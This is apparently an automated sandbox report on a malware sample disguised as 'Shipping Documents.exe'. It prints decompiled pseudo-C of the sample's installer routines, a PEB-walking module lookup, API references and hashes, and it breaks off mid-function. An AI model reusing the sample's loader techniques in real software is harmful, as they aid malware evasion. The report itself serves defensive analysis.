                                          • CloseClipboard.USER32 ref: 00405808
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: PB
                                          • API String ID: 590372296-3196168531
                                          • Opcode ID: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                          • Instruction ID: 9c2a32fab53b6b0d4bb0e075a5e6b47c54eb8059f7c6cc06f8c9c6988e8d3156
                                          • Opcode Fuzzy Hash: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
                                          • Instruction Fuzzy Hash: 42A16C71A00608BFDB119FA0DE85AAE7BB9FB48354F40403AFA44B61A0CB794E51DF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040473E, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E0040473E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x420528;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405928(0x3fb, _t146);
					E00406503(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405928(0x3fb, _t146);
							if(E00405CAE(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406228(0x41fd20, _t146);
							_t87 = E00406631(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406228(0x41fd20, _t146);
								_t89 = E00405C59(0x41fd20);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41fd20,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41fd20) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41fd20,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C07(0x41fd20);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41fd20) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BD2(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x423f1c; // 0x5bb880
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BBA(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41fd10);
									} else {
										E00404AF5(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424804 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042CE(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420d40 == _t158) {
									E00404697();
								}
								 *0x420d40 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420d50;
							_v60 = E00404A8F;
							_v56 = _t146;
							_v68 = E004062BB(_t146, 0x420d50, _t166, 0x420128, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC0(_t146);
								_t125 =  *((intOrPtr*)( *0x424754 + 0x11c));
								if( *((intOrPtr*)( *0x424754 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E004062BB(_t146, 0x420d50, _t166, 0, _t125);
									if(lstrcmpiA(0x4236e0, 0x420d50) != 0) {
										lstrcatA(_t146, 0x4236e0);
									}
								}
								 *0x420d40 =  *0x420d40 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C2D(_t146) != 0 && E00405C59(_t146) == 0) {
						E00405BC0(_t146);
					}
					 *0x423f18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042AC(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042AC(_t166);
					E004042E1(_t165);
					_t138 = E00406631(8);
					if(_t138 == 0) {
						L53:
						return E00404313(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                          0x0040473e
                                          0x00404744
                                          0x0040474a
                                          0x00404757
                                          0x00404765
                                          0x00404768
                                          0x00404770
                                          0x00404776
                                          0x00404776
                                          0x00404782
                                          0x00404785
                                          0x004047f3
                                          0x004047fa
                                          0x004048d1
                                          0x004048d8
                                          0x004048e7
                                          0x004048e7
                                          0x004048eb
                                          0x004048f5
                                          0x00404902
                                          0x00404904
                                          0x00404904
                                          0x00404912
                                          0x00404919
                                          0x00404920
                                          0x00404923
                                          0x0040495a
                                          0x0040495c
                                          0x00404962
                                          0x00404967
                                          0x0040496b
                                          0x0040496d
                                          0x0040496d
                                          0x00404989
                                          0x00000000
                                          0x0040498b
                                          0x0040498e
                                          0x0040499c
                                          0x004049a2
                                          0x004049a3
                                          0x004049a6
                                          0x004049a9
                                          0x00000000
                                          0x004049a9
                                          0x00404925
                                          0x00404927
                                          0x0040492b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040492d
                                          0x0040492d
                                          0x0040493a
                                          0x0040493f
                                          0x00000000
                                          0x00000000
                                          0x00404943
                                          0x00404945
                                          0x00404945
                                          0x0040494d
                                          0x0040494f
                                          0x00404952
                                          0x00404955
                                          0x00404958
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00404958
                                          0x004049b5
                                          0x004049bf
                                          0x004049c2
                                          0x004049c5
                                          0x004049cc
                                          0x004049cc
                                          0x004049ce
                                          0x004049ce
                                          0x004049d3
                                          0x004049d5
                                          0x004049dd
                                          0x004049e4
                                          0x004049e6
                                          0x004049f1
                                          0x004049f1
                                          0x004049e6
                                          0x004049f8
                                          0x00404a01
                                          0x00404a0b
                                          0x00404a13
                                          0x00404a2e
                                          0x00404a15
                                          0x00404a1e
                                          0x00404a1e
                                          0x00404a13
                                          0x00404a33
                                          0x00404a38
                                          0x00404a3d
                                          0x00404a46
                                          0x00404a46
                                          0x00404a4f
                                          0x00404a51
                                          0x00404a51
                                          0x00404a5d
                                          0x00404a65
                                          0x00404a6f
                                          0x00404a6f
                                          0x00404a74
                                          0x00000000
                                          0x00404a74
                                          0x00404923
                                          0x004048da
                                          0x004048e1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004048e1
                                          0x00404800
                                          0x00404809
                                          0x00404823
                                          0x00404828
                                          0x00404832
                                          0x00404839
                                          0x00404845
                                          0x00404848
                                          0x0040484b
                                          0x00404852
                                          0x0040485a
                                          0x0040485d
                                          0x00404861
                                          0x00404868
                                          0x00404870
                                          0x004048ca
                                          0x00404872
                                          0x00404873
                                          0x0040487a
                                          0x00404884
                                          0x0040488c
                                          0x00404899
                                          0x004048ad
                                          0x004048b1
                                          0x004048b1
                                          0x004048ad
                                          0x004048b6
                                          0x004048c3
                                          0x004048c3
                                          0x00404870
                                          0x00000000
                                          0x00404828
                                          0x00404816
                                          0x00000000
                                          0x00000000
                                          0x0040481c
                                          0x00000000
                                          0x00404787
                                          0x00404794
                                          0x0040479d
                                          0x004047aa
                                          0x004047aa
                                          0x004047b1
                                          0x004047b7
                                          0x004047c0
                                          0x004047c3
                                          0x004047c6
                                          0x004047ce
                                          0x004047d1
                                          0x004047d4
                                          0x004047da
                                          0x004047e1
                                          0x004047e8
                                          0x00404a7a
                                          0x00404a8c
                                          0x004047ee
                                          0x004047f1
                                          0x00000000
                                          0x004047f1
                                          0x004047e8

                                          APIs
                                          • GetDlgItem.USER32 ref: 0040478D
                                          • SetWindowTextA.USER32(00000000,?), ref: 004047B7
                                          • SHBrowseForFolderA.SHELL32(?,00420128,?), ref: 00404868
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404873
                                          • lstrcmpiA.KERNEL32(uvlcopdlxoed,00420D50,00000000,?,?), ref: 004048A5
                                          • lstrcatA.KERNEL32(?,uvlcopdlxoed), ref: 004048B1
                                          • SetDlgItemTextA.USER32 ref: 004048C3
                                            • Part of subcall function 00405928: GetDlgItemTextA.USER32 ref: 0040593B
                                            • Part of subcall function 00406503: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\202139769574 Shipping Documents.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040655B
                                            • Part of subcall function 00406503: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406568
                                            • Part of subcall function 00406503: CharNextA.USER32(?,"C:\Users\user\Desktop\202139769574 Shipping Documents.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040656D
                                            • Part of subcall function 00406503: CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040657D
                                          • GetDiskFreeSpaceA.KERNEL32(0041FD20,?,?,0000040F,?,0041FD20,0041FD20,?,00000001,0041FD20,?,?,000003FB,?), ref: 00404981
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040499C
                                            • Part of subcall function 00404AF5: lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                            • Part of subcall function 00404AF5: wsprintfA.USER32 ref: 00404B9B
                                            • Part of subcall function 00404AF5: SetDlgItemTextA.USER32 ref: 00404BAE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: A$C:\Users\user\AppData\Local\Temp$PB$uvlcopdlxoed
                                          • API String ID: 2624150263-1960534613
                                          • Opcode ID: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                          • Instruction ID: 829ad80b7ad659a1b6830b16dd2e7c43b5ac75723c1b4fdd6e47fb9b3f087a68
                                          • Opcode Fuzzy Hash: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                          • Instruction Fuzzy Hash: 48A18FB1A00209ABDB11EFA5DD45AAF7BB8EF84314F10843BF601B62D1D77C99418B6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C2D( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                          0x00402174
                                          0x0040217e
                                          0x00402188
                                          0x00402195
                                          0x004021a0
                                          0x004021a3
                                          0x004021bd
                                          0x004021c3
                                          0x004021c9
                                          0x004021cc
                                          0x004021d6
                                          0x004021da
                                          0x004021da
                                          0x004021df
                                          0x004021f0
                                          0x004021f8
                                          0x004022d4
                                          0x004022d4
                                          0x004022db
                                          0x004021fe
                                          0x004021fe
                                          0x0040220d
                                          0x00402211
                                          0x00402214
                                          0x0040221a
                                          0x00402228
                                          0x0040222b
                                          0x0040222d
                                          0x00402238
                                          0x00402238
                                          0x0040223d
                                          0x0040223f
                                          0x00402246
                                          0x00402246
                                          0x00402249
                                          0x00402252
                                          0x00402255
                                          0x0040225a
                                          0x0040225c
                                          0x00402269
                                          0x00402269
                                          0x0040226c
                                          0x00402278
                                          0x0040227b
                                          0x00402284
                                          0x0040228a
                                          0x00402291
                                          0x004022aa
                                          0x004022ac
                                          0x004022ba
                                          0x004022ba
                                          0x004022aa
                                          0x004022bd
                                          0x004022c3
                                          0x004022c3
                                          0x004022c6
                                          0x004022cc
                                          0x004022d2
                                          0x004022e7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004022d2
                                          0x004022dd
                                          0x00402a5d
                                          0x00402a69

                                          APIs
                                          • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 123533781-47812868
                                          • Opcode ID: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                                          • Instruction ID: 849b10897e6abda320580ec11bca4de19dcbd678575eb1056a8185fe26502568
                                          • Opcode Fuzzy Hash: b8edfd5adafe673e92bf7c77ec57b049cfece64d8502f07e39ea1df42828875f
                                          • Instruction Fuzzy Hash: BC510671A00208AFCB00DFE4C988A9D7BB6EF48314F2045BAF515EB2D1DA799981CB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406186(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E00406228();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                          0x004027b9
                                          0x004027cd
                                          0x004027d8
                                          0x004027d9
                                          0x00402918
                                          0x004027bb
                                          0x004027bb
                                          0x004027bd
                                          0x004027bf
                                          0x004027bf
                                          0x00402a5d
                                          0x00402a69

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                                          • Instruction ID: a7d85d328faede53e6a1e3b4f28690110558ed3aa0613785cbf8ce06a9006afe
                                          • Opcode Fuzzy Hash: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                                          • Instruction Fuzzy Hash: 35F0A771704111EED710EB649A49AEEB7A8DF51314F20067FF112B60C1D7B88946972A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001000, Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E10001000() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}



                                          0x10001017

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.657761961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000001.00000002.657756132.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.657768924.0000000010002000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                          • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                          • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                          • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404CB1, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E00404CB1(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x424788;
				_v28 =  *0x424754 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42475d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404BFF(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42475c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x420d34;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x420d48;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x420d34 = 0;
								 *0x420d48 = 0;
								 *0x4247c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42475d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404C7F();
								}
